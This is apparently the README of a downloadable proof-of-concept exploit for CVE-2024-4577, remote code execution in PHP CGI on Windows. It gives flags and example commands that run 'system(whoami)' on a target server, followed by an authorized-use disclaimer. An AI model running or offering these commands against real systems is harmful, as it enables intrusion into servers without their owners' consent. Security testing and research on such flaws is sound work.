
Exploit (C) CVE-2024-4577 on PHP CGI
This repository contains a proof-of-concept exploit for the CVE-2024-4577 vulnerability in PHP CGI versions 8.1, 8.2, and 8.3 running on Windows systems. This vulnerability allows remote code execution (RCE) by exploiting insecure PHP CGI configurations.
-u : Target URL PHP CGI
-c : Execute the command on the server
-p : Listen Port
=> CVE-2024-4577.exe -u http://target/cgi-bin/php-cgi.exe "system(whoami)" Or Argument listen port : => CVE-2024-4577.exe -u http://target/cgi-bin/php-cgi.exe "system(whoami)" -p 1234
WARNING: This tool is for educational and authorized security testing only!
Do NOT use this exploit on systems without explicit permission from the owner.
Unauthorized usage may lead to legal consequences.
Telegrame : @ByteReaper0